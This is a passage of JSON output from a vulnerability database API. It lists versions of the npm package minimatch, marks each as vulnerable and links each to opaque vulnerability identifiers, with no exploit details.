"is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@2.0.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/155793?format=api", "purl": "pkg:npm/minimatch@2.0.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@2.0.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/155794?format=api", "purl": "pkg:npm/minimatch@2.0.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@2.0.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/155795?format=api", "purl": "pkg:npm/minimatch@2.0.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@2.0.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/155796?format=api", "purl": "pkg:npm/minimatch@2.0.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@2.0.9" }, { "url": "http://public2.vulnerablecode.io/api/packages/155797?format=api", "purl": "pkg:npm/minimatch@2.0.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@2.0.10" }, { "url": "http://public2.vulnerablecode.io/api/packages/155798?format=api", "purl": "pkg:npm/minimatch@3.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@3.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/22618?format=api", "purl": "pkg:npm/minimatch@3.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@3.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/337161?format=api", "purl": "pkg:npm/minimatch@3.0.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@3.0.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/337162?format=api", "purl": "pkg:npm/minimatch@3.0.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@3.0.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/79694?format=api", "purl": "pkg:npm/minimatch@3.0.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@3.0.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/909339?format=api", "purl": "pkg:npm/minimatch@3.0.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@3.0.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/909340?format=api", "purl": "pkg:npm/minimatch@3.0.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@3.0.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/909341?format=api", "purl": "pkg:npm/minimatch@3.0.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@3.0.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/909342?format=api", "purl": "pkg:npm/minimatch@3.1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@3.1.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909343?format=api", "purl": "pkg:npm/minimatch@3.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@3.1.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909344?format=api", "purl": "pkg:npm/minimatch@3.1.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@3.1.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/67889?format=api", "purl": "pkg:npm/minimatch@4.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@4.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909345?format=api", "purl": "pkg:npm/minimatch@4.1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@4.1.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909346?format=api", "purl": "pkg:npm/minimatch@4.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@4.1.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909347?format=api", "purl": "pkg:npm/minimatch@4.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@4.2.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909348?format=api", "purl": "pkg:npm/minimatch@4.2.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@4.2.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909349?format=api", "purl": "pkg:npm/minimatch@4.2.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@4.2.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/909350?format=api", "purl": "pkg:npm/minimatch@4.2.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@4.2.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/62801?format=api", "purl": "pkg:npm/minimatch@4.2.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@4.2.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/67890?format=api", "purl": "pkg:npm/minimatch@5.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@5.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909351?format=api", "purl": "pkg:npm/minimatch@5.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@5.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909352?format=api", "purl": "pkg:npm/minimatch@5.1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@5.1.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909353?format=api", "purl": "pkg:npm/minimatch@5.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@5.1.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909354?format=api", "purl": "pkg:npm/minimatch@5.1.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@5.1.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/909355?format=api", "purl": "pkg:npm/minimatch@5.1.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@5.1.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/909356?format=api", "purl": "pkg:npm/minimatch@5.1.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@5.1.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/909357?format=api", "purl": "pkg:npm/minimatch@5.1.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@5.1.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/909358?format=api", "purl": "pkg:npm/minimatch@5.1.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@5.1.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/62799?format=api", "purl": "pkg:npm/minimatch@5.1.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@5.1.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/67891?format=api", "purl": "pkg:npm/minimatch@6.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909359?format=api", "purl": "pkg:npm/minimatch@6.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909360?format=api", "purl": "pkg:npm/minimatch@6.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/909361?format=api", "purl": "pkg:npm/minimatch@6.0.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.0.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/909362?format=api", "purl": "pkg:npm/minimatch@6.0.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.0.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/909363?format=api", "purl": "pkg:npm/minimatch@6.1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.1.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909364?format=api", "purl": "pkg:npm/minimatch@6.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.1.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909365?format=api", "purl": "pkg:npm/minimatch@6.1.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.1.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/909366?format=api", "purl": "pkg:npm/minimatch@6.1.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.1.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/909367?format=api", "purl": "pkg:npm/minimatch@6.1.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.1.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/909368?format=api", "purl": "pkg:npm/minimatch@6.1.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.1.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/909369?format=api", "purl": "pkg:npm/minimatch@6.1.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.1.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/909370?format=api", "purl": "pkg:npm/minimatch@6.1.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.1.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/909371?format=api", "purl": "pkg:npm/minimatch@6.1.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.1.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/909372?format=api", "purl": "pkg:npm/minimatch@6.1.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.1.9" }, { "url": "http://public2.vulnerablecode.io/api/packages/909373?format=api", "purl": "pkg:npm/minimatch@6.1.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.1.10" }, { "url": "http://public2.vulnerablecode.io/api/packages/909374?format=api", "purl": "pkg:npm/minimatch@6.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.2.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/62798?format=api", "purl": "pkg:npm/minimatch@6.2.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.2.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/67892?format=api", "purl": "pkg:npm/minimatch@7.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909375?format=api", "purl": "pkg:npm/minimatch@7.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909376?format=api", "purl": "pkg:npm/minimatch@7.1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.1.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909377?format=api", "purl": "pkg:npm/minimatch@7.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.1.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909378?format=api", "purl": "pkg:npm/minimatch@7.1.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.1.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/909379?format=api", "purl": "pkg:npm/minimatch@7.1.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.1.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/909380?format=api", "purl": "pkg:npm/minimatch@7.1.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.1.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/909381?format=api", "purl": "pkg:npm/minimatch@7.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.2.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909382?format=api", "purl": "pkg:npm/minimatch@7.3.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.3.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909383?format=api", "purl": "pkg:npm/minimatch@7.4.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.4.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909384?format=api", "purl": "pkg:npm/minimatch@7.4.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.4.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909385?format=api", "purl": "pkg:npm/minimatch@7.4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.4.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/909386?format=api", "purl": "pkg:npm/minimatch@7.4.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.4.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/909387?format=api", "purl": "pkg:npm/minimatch@7.4.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.4.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/909388?format=api", "purl": "pkg:npm/minimatch@7.4.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" 